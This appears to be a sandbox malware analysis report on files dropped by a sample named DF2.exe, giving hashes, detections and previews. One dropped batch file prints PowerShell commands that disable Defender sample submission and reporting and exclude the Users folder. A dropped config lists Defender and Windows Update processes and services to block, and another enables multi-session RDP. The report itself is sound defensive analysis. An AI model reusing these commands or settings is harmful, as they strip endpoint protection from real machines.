                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:Generic INItialization configuration [SLPolicy]
                Category:dropped
                Size (bytes):456534
                Entropy (8bit):5.450314708570292
                Encrypted:false
                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                Malicious:false
                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                Process:C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
                File Type:data
                Category:dropped
                Size (bytes):10480965
                Entropy (8bit):6.710750822103746
                Encrypted:false
                SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                MD5:458F2D710689EA3CF61D5CD97C6B2470
                SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                Malicious:false
                Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):64
                Entropy (8bit):0.34726597513537405
                Encrypted:false
                SSDEEP:3:Nlll:Nll
                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                Malicious:false
                Preview:@...e...........................................................
                Process:C:\Users\user\Desktop\DF2.exe
                File Type:DOS batch file, ASCII text
                Category:dropped
                Size (bytes):259
                Entropy (8bit):4.933902901538645
                Encrypted:false
                SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                MD5:261A842203ADB67547C83DE132C7A076
                SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                Malicious:true
                Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):3744
                Entropy (8bit):5.505070443586618
                Encrypted:false
                SSDEEP:96:isYJ9VFlDT0HU0Hn0H12ON00He0H+kQHR3+PrT60HMVVH3HF0HMttHMj:DiTXT000H0UON00+0TQxOPrT60AVXl0j
                MD5:CA696858DA9B297D70FBEA1CFE2FA988
                SHA1:BB4A9092341B8BD857771F17DA2502A8C38F0F08
                SHA-256:283B508164273D6194577E4725641996A03099811B3A0A354DB8057A5F9051EA
                SHA-512:2E1ECD31EE4593D3EFCA4C01A9A74C697C175B1BB8B7C0133DFC9B7378EE2F8165F6CB912AB32DA34D5AEA4C7E5281FF57680E2707C19B843143797BE23DBB48
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-10
                Process:C:\Users\user\Desktop\DF2.exe
                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):10669056
                Entropy (8bit):7.443816651911507
                Encrypted:false
                SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                MD5:2F829F1CB631D234C54F2E6C6F72EB57
                SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 70%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\DF2.exe
                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):98304
                Entropy (8bit):6.298274541598319
                Encrypted:false
                SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                MD5:319865D78CC8DF6270E27521B8182BFF
                SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 58%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
                File Type:Generic INItialization configuration [svc]
                Category:dropped
                Size (bytes):195
                Entropy (8bit):4.692426693515089
                Encrypted:false
                SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                MD5:E025B58CB2D118FAFAE00850EE91C5F9
                SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                Malicious:false
                Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                Process:C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):22722
                Entropy (8bit):5.184533935957373
                Encrypted:false
                SSDEEP:384:ubbEbNQ6s69WS8vv88o888888888888j888888888888e88888888088888888AO:ubbEbNQ6s69WS8vv88o8888888888881
                MD5:D54CFDE38F3D246E0E738AF07D21274F
                SHA1:93EA2079056DC183F190B2D6331EEDA97CD83ACE
                SHA-256:669DCBC3C0530219523D6B69D69D6A2B150F4145B0B9251D041B6689F4D8598E
                SHA-512:F13BD5CF5DF2772B72E693177CEDCD9201CCB9AA40CF348C05E0DFBBB578B1104FB38A43B3DCF4467C203E3F88DB99F123CFD7DF99BF3D3B52B7CF5A1E4C2911
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) -> Done
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):37376
                Entropy (8bit):5.7181012847214445
                Encrypted:false
                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):104448
                Entropy (8bit):6.236071662185895
                Encrypted:false
                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 8%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):115712
                Entropy (8bit):6.193969228624904
                Encrypted:false
                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 26%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):91136
                Entropy (8bit):6.2041507656664825
                Encrypted:false
                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 70%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):129536
                Entropy (8bit):6.2852879161990645
                Encrypted:false
                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                MD5:88E6178B0CD434C8D14710355E78E691
                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 3%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:Generic INItialization configuration [cnccli]
                Category:dropped
                Size (bytes):213
                Entropy (8bit):5.129024990254676
                Encrypted:false
                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
